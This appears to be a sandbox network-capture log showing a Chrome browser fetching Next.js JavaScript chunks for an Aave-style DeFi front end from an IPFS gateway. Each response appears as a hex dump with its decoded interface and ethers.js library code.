                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 38 34 5d 2c 7b 35 30 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 39 31 36 35 35 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 32 39 36 33 30 29 2c 63 3d 28 72 28 36 37 32 39 34 29 2c 72 28 37 33 39 36 35 29 29 2c 6c 3d 72 28 34 31 30 32 34 29 2c 64 3d 72 28 38 35 38 39 33 29 2c 70 3d 5b 22 6d 69 6e 56 61 6c 22 2c 22 6d 61 78 56 61 6c 22 2c 22 70 65 72 63 65 6e 74 56 61 72 69 61 6e 74 22 2c 22 68 79 70 68 65 6e 56 61 72 69 61 6e 74 22 5d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),a=r(30120),s=r(29630),c=(r(67294),r(73965)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"]
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 6c 75 65 3a 76 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 68 29 29 3a 28 30 2c 64 2e 6a 73 78 73 29 28 64 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 6c 2e 42 2c 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 76 61 6c 75 65 3a 31 30 30 2a 76 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 2d 67 68 6f 2d 66
                                                                                                                                                                                                                                                  Data Ascii: x({compact:!0,percent:!0,value:v,visibleDecimals:2,variant:null!==t&&void 0!==t?t:"h3","data-cy":"apy"},h)):(0,d.jsxs)(d.Fragment,{children:[(0,d.jsx)(l.B,x({compact:!0,value:100*v,visibleDecimals:2,variant:null!==t&&void 0!==t?t:"h3","data-cy":"apy-gho-f
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 63 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 63 6f 6c 6f 72 3a 22 64 61 72 6b 22 3d 3d 3d 78 3f 22 23 41 35 41 38 42 36 22 3a 22 23 36 32 36 37 37 42 22 7d 2c 76 61 72 69 61 6e 74 3a 76 3f 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 63 61 70 74 69 6f 6e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 22 64 69 76 22 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 2c 6c 26 26 6c 5d 7d 29 2c 66 3f 28 30 2c 63 2e 6a 73 78 29 28 73 2e 5a 2c 7b 77 69 64 74 68
                                                                                                                                                                                                                                                  Data Ascii: exDirection:"column"},children:[(0,c.jsxs)(i.Z,{sx:{display:"inline-flex",alignItems:"center"},children:[(0,c.jsx)(a.Z,{sx:{color:"dark"===x?"#A5A8B6":"#62677B"},variant:v?"description":"caption",component:"div",children:r}),l&&l]}),f?(0,c.jsx)(s.Z,{width
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 61 73 73 65 74 20 69 73 20 70 6c 61 6e 6e 65 64 20 74 6f 20 62 65 20 6f 66 66 62 6f 61 72 64 65 64 20 64 75 65 20 74 6f 20 61 6e 20 41 61 76 65 20 50 72 6f 74 6f 63 6f 6c 20 47 6f 76 65 72 6e 61 6e 63 65 20 64 65 63 69 73 69 6f 6e 2e 20 3c 30 3e 4d 6f 72 65 20 64 65 74 61 69 6c 73 3c 2f 30 3e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 73 2e 6a 73 78 29 28 61 2e 72 55 2c 7b 68 72 65 66 3a 6e 2c 73 78 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 7d 29 7d 7d 29 7d 7d 2c 31 32 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76
                                                                                                                                                                                                                                                  Data Ascii: (0,s.jsx)(o.cC,{id:"This asset is planned to be offboarded due to an Aave Protocol Governance decision. <0>More details</0>",components:{0:(0,s.jsx)(a.rU,{href:n,sx:{textDecoration:"underline"}})}})}},1252:function(e,n,r){r.d(n,{O:function(){return i}});v
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 5f 68 61 72 6d 6f 6e 79 5f 76 33 22 3d 3d 3d 6e 3f 22 68 74 74 70 73 3a 2f 2f 73 6e 61 70 73 68 6f 74 2e 6f 72 67 2f 23 2f 61 61 76 65 2e 65 74 68 2f 70 72 6f 70 6f 73 61 6c 2f 30 78 38 31 61 37 38 31 30 39 39 34 31 65 35 65 30 61 63 36 63 62 35 65 62 66 38 32 35 39 37 63 38 33 39 63 32 30 61 64 36 38 32 31 61 38 63 33 66 66 30 36 33 64 62 61 33 39 30 33 32 35 33 33 64 34 22 3a 6e 26 26 22 70 72 6f 74 6f 5f 66 61 6e 74 6f 6d 5f 76 33 22 3d 3d 3d 6e 3f 22 68 74 74 70 73 3a 2f 2f 73 6e 61 70 73 68 6f 74 2e 6f 72 67 2f 23 2f 61 61 76 65 2e 65 74 68 2f 70 72 6f 70 6f 73 61 6c 2f 30 78 65 65 66 63 64 37 36 65 35 32 33 33 39 31 61 31 34 63 66 64 30 61 37 39 62 35 33 31 65 61 30 61 33 66 61 66 30 65 62 34 61 30 35 38 65 32 35 35 66 61 63 31 33 61 32 64 32 32 34
                                                                                                                                                                                                                                                  Data Ascii: _harmony_v3"===n?"https://snapshot.org/#/aave.eth/proposal/0x81a78109941e5e0ac6cb5ebf82597c839c20ad6821a8c3ff063dba39032533d4":n&&"proto_fantom_v3"===n?"https://snapshot.org/#/aave.eth/proposal/0xeefcd76e523391a14cfd0a79b531ea0a3faf0eb4a058e255fac13a2d224
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 72 61 77 2c 20 62 6f 72 72 6f 77 73 20 61 6e 64 20 72 65 70 61 79 73 20 61 72 65 20 69 6d 70 61 63 74 65 64 2e 22 7d 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 5a 2c 7b 61 72 72 6f 77 3a 21 30 2c 70 6c 61 63 65 6d 65 6e 74 3a 22 74 6f 70 22 2c 50 6f 70 70 65 72 43 6f 6d 70 6f 6e 65 6e 74 3a 63 2e 45 2c 74 69 74 6c 65 3a 28 30 2c 6c 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 70 79 3a 34 2c 70 78 3a 36 7d 2c 73 70 61 63 69 6e 67 3a 31 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 64 2c 7b 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 63 6f 6c 6f 72 3a 22 65 72 72 6f 72 2e 6d 61 69 6e
                                                                                                                                                                                                                                                  Data Ascii: raw, borrows and repays are impacted."})},p=function(){return(0,l.jsx)(i.Z,{arrow:!0,placement:"top",PopperComponent:c.E,title:(0,l.jsx)(a.Z,{sx:{py:4,px:6},spacing:1,children:(0,l.jsx)(d,{})}),children:(0,l.jsx)(s.Z,{sx:{fontSize:"20px",color:"error.main
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 63 6f 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 74 2e 5a 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 69 2e 4f 2c 7b 7d 29 7d 29 7d 7d 2c 31 34 33 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 33 36 38 36 34 29 2c 69 3d 72 28 34 39 35 30 31 29 2c 61 3d 72 28 35 38 35 32 37 29 2c 73 3d 72 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e
                                                                                                                                                                                                                                                  Data Ascii: con:(0,a.jsx)(t.Z,{}),children:(0,a.jsx)(i.O,{})})}},14379:function(e,n,r){r.d(n,{B:function(){return d}});var t=r(59499),o=r(36864),i=r(49501),a=r(58527),s=r(85893);function c(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwn
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 22 50 65 72 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 2c 20 74 68 65 20 46 61 6e 74 6f 6d 20 6d 61 72 6b 65 74 20 68 61 73 20 62 65 65 6e 20 66 72 6f 7a 65 6e 2e 22 7d 29 3a 22 45 74 68 65 72 65 75 6d 20 41 4d 4d 22 3d 3d 3d 6e 3f 28 30 2c 73 2e 6a 73 78 29 28 74 2e 63 43 2c 7b 69 64 3a 22 50 65 72 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 2c 20 74 68 65 20 56 32 20 41 4d 4d 20 6d 61 72 6b 65 74 20 68 61 73 20 62 65 65 6e 20 64 65 70 72 65 63 61 74 65 64 2e 22 7d 29 3a 6e 75 6c 6c 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 22 48 61 72 6d 6f 6e 79 22 3d 3d 3d 65 3f 6e 3f 22 68 74 74 70 73 3a 2f 2f 67 6f 76 65 72 6e 61 6e 63 65 2e 61 61 76 65 2e 63 6f 6d 2f 74 2f 68 61 72 6d 6f 6e 79 2d 68 6f 72 69 7a 6f 6e 2d 62 72 69 64 67 65
                                                                                                                                                                                                                                                  Data Ascii: "Per the community, the Fantom market has been frozen."}):"Ethereum AMM"===n?(0,s.jsx)(t.cC,{id:"Per the community, the V2 AMM market has been deprecated."}):null},l=function(e,n){return"Harmony"===e?n?"https://governance.aave.com/t/harmony-horizon-bridge
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 63 75 72 72 65 6e 74 4d 61 72 6b 65 74 2c 6c 3d 65 2e 73 68 6f 77 53 75 70 70 6c 79 43 61 70 54 6f 6f 6c 74 69 70 73 2c 64 3d 76 6f 69 64 20 30 21 3d 3d 6c 26 26 6c 2c 79 3d 65 2e 73 68 6f 77 42 6f 72 72 6f 77 43 61 70 54 6f 6f 6c 74 69 70 73 2c 67 3d 76 6f 69 64 20 30 21 3d 3d 79 26 26 79 2c 77 3d 65 2e 73 68 6f 77 44 65 62 74 43 65 69 6c 69 6e 67 54 6f 6f 6c 74 69 70 73 2c 5a 3d 76 6f 69 64 20 30 21 3d 3d 77 26 26 77 2c 43 3d 65 2e 69 73 49 73 6f 6c 61 74 65 64 2c 6b 3d 28 30 2c 6d 2e 6f 76 29 28 29 2c 4f 3d 6b 2e 73 75 70 70 6c 79 43 61 70 2c 44 3d 6b 2e 62 6f 72 72 6f 77 43 61 70 2c 50 3d 6b 2e 64 65 62 74 43 65 69 6c 69 6e 67 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78 73 29 28 70 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 62 2e 6a 73 78 29
                                                                                                                                                                                                                                                  Data Ascii: currentMarket,l=e.showSupplyCapTooltips,d=void 0!==l&&l,y=e.showBorrowCapTooltips,g=void 0!==y&&y,w=e.showDebtCeilingTooltips,Z=void 0!==w&&w,C=e.isIsolated,k=(0,m.ov)(),O=k.supplyCap,D=k.borrowCap,P=k.debtCeiling;return(0,b.jsxs)(p.Z,{children:[(0,b.jsx)


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  75192.168.2.549794209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/4700.1016c158c2995fc4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 377002
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeigzzrytbgdveykaqstxnhgtd5iwr252qk65k5clforsnkavpbwegi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4700.1016c158c2995fc4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeigzzrytbgdveykaqstxnhgtd5iwr252qk65k5clforsnkavpbwegi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 65 63 63 38 38 30 63 39 36 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42ecc880c96-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 30 30 5d 2c 7b 35 36 36 37 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 2c 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 6c 65 74 20 6e 3d 21 31 2c 69 3d 21 31 3b 63 6f 6e 73 74 20 6f 3d 7b 64 65 62 75 67 3a 31 2c 64 65 66 61 75 6c 74 3a 32 2c 69 6e 66 6f 3a 32 2c 77 61 72 6e 69 6e 67 3a 33 2c 65 72 72 6f 72 3a 34 2c 6f 66 66 3a 35 7d 3b 6c 65 74 20 73 3d 6f 2e 64 65 66 61 75 6c 74 2c 61 3d 6e 75 6c 6c 3b 63 6f 6e 73 74
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4700],{56674:function(e,t,r){"use strict";r.d(t,{J:function(){return w},c:function(){return A}});let n=!1,i=!1;const o={debug:1,default:2,info:2,warning:3,error:4,off:5};let s=o.default,a=null;const
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 49 4d 49 54 22 2c 65 2e 54 52 41 4e 53 41 43 54 49 4f 4e 5f 52 45 50 4c 41 43 45 44 3d 22 54 52 41 4e 53 41 43 54 49 4f 4e 5f 52 45 50 4c 41 43 45 44 22 2c 65 2e 41 43 54 49 4f 4e 5f 52 45 4a 45 43 54 45 44 3d 22 41 43 54 49 4f 4e 5f 52 45 4a 45 43 54 45 44 22 7d 28 6c 7c 7c 28 6c 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 68 3d 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 22 3b 63 6c 61 73 73 20 66 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 22 76 65 72 73 69 6f 6e 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 7d 5f 6c 6f 67 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                                                                                                                                                                                  Data Ascii: IMIT",e.TRANSACTION_REPLACED="TRANSACTION_REPLACED",e.ACTION_REJECTED="ACTION_REJECTED"}(l||(l={}));const h="0123456789abcdef";class f{constructor(e){Object.defineProperty(this,"version",{enumerable:!0,value:e,writable:!1})}_log(e,t){const r=e.toLowerCase
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 54 41 42 4c 45 5f 47 41 53 5f 4c 49 4d 49 54 3a 73 3d 74 7d 73 26 26 28 65 2b 3d 22 20 5b 20 53 65 65 3a 20 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 73 2e 65 74 68 65 72 73 2e 6f 72 67 2f 76 35 2d 65 72 72 6f 72 73 2d 22 2b 73 2b 22 20 5d 22 29 2c 6e 2e 6c 65 6e 67 74 68 26 26 28 65 2b 3d 22 20 28 22 2b 6e 2e 6a 6f 69 6e 28 22 2c 20 22 29 2b 22 29 22 29 3b 63 6f 6e 73 74 20 61 3d 6e 65 77 20 45 72 72 6f 72 28 65 29 3b 72 65 74 75 72 6e 20 61 2e 72 65 61 73 6f 6e 3d 6f 2c 61 2e 63 6f 64 65 3d 74 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 5b 65 5d 3d 72 5b 65 5d 7d 29 29 2c 61 7d 74 68 72 6f 77 45 72 72 6f 72 28 65 2c 74 2c 72 29 7b 74 68 72 6f 77 20 74 68 69 73 2e 6d 61 6b 65 45 72 72 6f 72
                                                                                                                                                                                                                                                  Data Ascii: TABLE_GAS_LIMIT:s=t}s&&(e+=" [ See: https://links.ethers.org/v5-errors-"+s+" ]"),n.length&&(e+=" ("+n.join(", ")+")");const a=new Error(e);return a.reason=o,a.code=t,Object.keys(r).forEach((function(e){a[e]=r[e]})),a}throwError(e,t,r){throw this.makeError
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 77 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 69 6e 73 74 61 6e 74 69 61 74 65 20 61 62 73 74 72 61 63 74 20 63 6c 61 73 73 20 22 2b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 2e 6e 61 6d 65 29 2b 22 20 64 69 72 65 63 74 6c 79 3b 20 75 73 65 20 61 20 73 75 62 2d 63 6c 61 73 73 22 2c 66 2e 65 72 72 6f 72 73 2e 55 4e 53 55 50 50 4f 52 54 45 44 5f 4f 50 45 52 41 54 49 4f 4e 2c 7b 6e 61 6d 65 3a 65 2e 6e 61 6d 65 2c 6f 70 65 72 61 74 69 6f 6e 3a 22 6e 65 77 22 7d 29 3a 65 21 3d 3d 4f 62 6a 65 63 74 26 26 6e 75 6c 6c 21 3d 65 7c 7c 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 22 6d 69 73 73 69 6e 67 20 6e 65 77 22 2c 66 2e 65 72 72 6f 72 73 2e 4d 49 53 53 49 4e 47 5f 4e 45 57 2c 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 7d 29 7d 73 74 61 74 69 63 20 67 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: wError("cannot instantiate abstract class "+JSON.stringify(t.name)+" directly; use a sub-class",f.errors.UNSUPPORTED_OPERATION,{name:e.name,operation:"new"}):e!==Object&&null!=e||this.throwError("missing new",f.errors.MISSING_NEW,{name:t.name})}static glo
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 69 66 79 20 76 61 6c 75 65 22 29 3b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 3b 65 3b 29 74 2e 75 6e 73 68 69 66 74 28 32 35 35 26 65 29 2c 65 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2f 32 35 36 29 29 3b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 74 2e 70 75 73 68 28 30 29 2c 67 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 29 29 7d 69 66 28 74 2e 61 6c 6c 6f 77 4d 69 73 73 69 6e 67 50 72 65 66 69 78 26 26 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 30 78 22 21 3d 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 29 26 26 28 65 3d 22 30 78 22 2b 65 29 2c 70 28 65 29 26 26 28 65 3d 65 2e 74 6f 48 65 78 53 74 72 69 6e 67 28 29 29 2c 62 28 65 29 29 7b 6c 65 74 20 72 3d 65 2e 73 75 62 73 74 72 69
                                                                                                                                                                                                                                                  Data Ascii: ify value");const t=[];for(;e;)t.unshift(255&e),e=parseInt(String(e/256));return 0===t.length&&t.push(0),g(new Uint8Array(t))}if(t.allowMissingPrefix&&"string"===typeof e&&"0x"!==e.substring(0,2)&&(e="0x"+e),p(e)&&(e=e.toHexString()),b(e)){let r=e.substri
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 74 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 33 30 37 30 37 29 2c 69 3d 72 28 32 33 34 39 29 2c 6f 3d 72 28 32 37 31 39 37 29 2c 73 3d 72 28 31 37 34 39 38 29 2c 61 3d 72 28 32 32 32 30 39 29 2c 75 3d 72 28 32 32 31 31 34 29 2c 63 3d 72 28 32 37 35 37 34 29 2c 6c 3d 72 28 39 37 32 30 38 29 2c 68 3d 72 28 37 32 31 34 35 29 2c 66 3d 72 28 31 36 38 29 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 72 7c 7c 28 72 3d 50 72 6f 6d 69 73 65 29 29 28 28 66 75 6e 63 74 69 6f 6e 28 69 2c 6f 29 7b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 74 72 79 7b 75 28 6e 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 74 29 7b 6f 28 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65
                                                                                                                                                                                                                                                  Data Ascii: tion(){return Vt}});var n=r(30707),i=r(2349),o=r(27197),s=r(17498),a=r(22209),u=r(22114),c=r(27574),l=r(97208),h=r(72145),f=r(168);var d=function(e,t,r,n){return new(r||(r=Promise))((function(i,o){function s(e){try{u(n.next(e))}catch(t){o(t)}}function a(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 29 3a 74 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 64 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 6c 65 74 20 69 3d 7b 7d 3b 72 2e 6c 65 6e 67 74 68 3d 3d 3d 74 2e 69 6e 70 75 74 73 2e 6c 65 6e 67 74 68 2b 31 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 72 5b 72 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 28 69 3d 28 30 2c 6c 2e 73 68 61 6c 6c 6f 77 43 6f 70 79 29 28 72 2e 70 6f 70 28 29 29 29 2c 70 2e 63 68 65 63 6b 41 72 67 75 6d 65 6e 74 43 6f 75 6e 74 28 72 2e 6c 65 6e 67 74 68 2c 74 2e 69 6e 70 75 74 73 2e 6c 65 6e 67 74 68 2c 22 70 61 73 73 65 64 20 74 6f 20 63 6f 6e 74 72 61 63 74 22 29 2c 65 2e 73 69 67 6e 65 72 3f 69 2e 66 72 6f 6d 3f 69 2e
                                                                                                                                                                                                                                                  Data Ascii: ):t}))}function y(e,t,r){return d(this,void 0,void 0,(function*(){let i={};r.length===t.inputs.length+1&&"object"===typeof r[r.length-1]&&(i=(0,l.shallowCopy)(r.pop())),p.checkArgumentCount(r.length,t.inputs.length,"passed to contract"),e.signer?i.from?i.
